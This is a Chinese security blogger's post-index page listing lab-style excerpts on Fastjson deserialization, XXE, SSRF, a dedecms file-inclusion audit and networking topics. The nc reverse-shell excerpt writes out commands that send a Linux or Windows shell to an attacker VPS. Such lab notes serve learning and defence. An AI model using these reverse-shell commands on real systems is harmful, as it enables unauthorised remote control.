自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

预览 取消 提交

自定义博客皮肤

-+
上一步保存

安全大白

大白进阶

  • 博客(12)
  • 收藏
  • 关注
排序:
按最后发布时间
按访问量
RSS订阅

原创 fastjson反序列化漏洞

这里写自定义目录标题Fastjson<=1.2.47环境:1)Docker vulhub搭建环境2)jdk安装3)marshalsec与Exploit.java下载4)编译Exploit.java文件5)python开启web服务6)开启rmi服务7) nc开启端口监听8)漏洞探测9)反弹shellFastjson<=1.2.24Fastjson<=1.2.47环境:Centos7 靶机(docker环境)Centos7 vps攻击机Vulhub fastjson-1.2.47

2021-02-13 12:08:06 7478 2

原创 内网渗透:nc反弹shell总结

1、实验环境Kali:192.168.32.132 //模拟靶机Windows:192.168.32.1 //模拟公网vps2、若靶机上存在nc,获取反向shell:vps攻击机:nc -lvp 9999 // 监听9999端口靶机:nc 1.1.1.1 9999 -e /bin/bash // Linux正向连接公网vps1.1.1.1的9999端口 nc 1.1.1.1 9999 -e c:\windows\system32\cmd.exe // Windows3、若

2021-01-03 11:17:26 6473

原创 内网渗透:利用pingtunnel搭建icmp隧道

1111111

2021-01-01 21:49:06 1256

原创 解决Linux提示E: 无法获得锁 /var/lib/dpkg/lock-frontend - open问题

准备为新安装的ubuntu安装ssh,提示如下:解决方法:运行sudo rm /var/lib/dpkg/lock-frontend,强制解锁即可。再次安装ssh:

2020-12-26 11:15:49 1710

原创 XXE原理利用与防御

0x00 前言一个认真搞安全的Student,博客用于学习总结,欢迎大家交流指出不足。***更欢迎大家去我的博客提出意见:***xiao’s blog0x01 XXE原理在讲XXE之前,先了解一下XML的结构XXE即XML实体注入,漏洞主要发生在XML的DTD部分,关键字SYSTEM能够读取URI里面的内容,将读取到的内容赋值到实体中,XML在使用的过程中,将实体输出,从而产生漏洞。P...

2020-04-19 22:49:15 501

原创 SSRF原理利用与防御

0x00 前言一个认真搞安全的Student,博客用于学习总结,欢迎大家交流指出不足。SSRF作为不可忽视的漏洞,地位举足轻重,本篇就SSRF的原理、利用、防御进行一个小小的总结。0x01 SSRF原理1)什么是SSRF服务器请求伪造,攻击者利用可以发起网络请求的服务来对其他网络服务进行攻击。2)SSRF的作用一般用于探测内网端口信息,查看文件,甚至可以getshell3)SSRF...

2020-04-18 18:02:18 472

转载 virtualenvwrapper.sh报错: There was a problem running the initialization hooks.解决

请查看这位大神的博客:https://www.cnblogs.com/cpl9412290130/p/10019231.html完美解决我的问题

2019-11-03 10:47:30 714

原创 dedecmsv5.7sp1远程文件包含漏洞审计

漏洞在/install/index.php(index.php.bak)文件中,漏洞起因是$$符号使用不当,导致变量覆盖以至于最后引起远程文件包含漏洞。

2019-10-27 00:19:37 769

原创 Python3.7下载与安装pygame

首先下载对应的pygame版本,注意32位与64位:https://www.lfd.uci.edu/~gohlke/pythonlibs/#pygame我这里下载的是:pygame-1.9.4-cp37-cp37m-win_amd64.whl在安装目录下面直接cmd运行安装pygame:python -m pip install pygame-1.9.4-cp37-cp37m-win_am...

2019-08-12 17:16:44 2543

原创 路由篇二:OSPF邻居建立过程(图文)

邻居状态机:Down --> Init–> 2 Way --> exStart–> exchange --> loading --> full(邻居) (预启动) (预交互) (加载) (邻接)1.HELLO报文HELLO报文的作用:邻居状态的建立、维护、拆除;作用于:Down --> Init–> 2 Way2.DBD报文DBD报...

2019-07-25 15:33:04 1526

原创 路由篇一:RIP路由环路形成及防环

RIP路由环路形成及防环认识环路及防环前先清楚RIP路由算法:Bellman算法(贝尔曼):①如果收到邻居给的路由,若本地没有,则接收;②如果收到邻居给的路由,若本地有,根据度量值对比,若优则录入,若劣质则丢弃;③如果收到邻居给的路由,若劣质,但是还是从原有的邻居学到的,也录入。环路的形成:正常情况下:A会像平常一样每30S广播路由表,把A=1(1为跳数,下同)给到R1,R2学到...

2019-07-25 11:59:40 5154 1

转载 secureCRT命令行字符重叠只显示一半

secureCRT命令行字符重叠只显示一半转载至这位的:https://blog.csdn.net/yuanhaiwn/article/details/80630973很好的解决问题

2019-07-25 10:31:59 5517

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除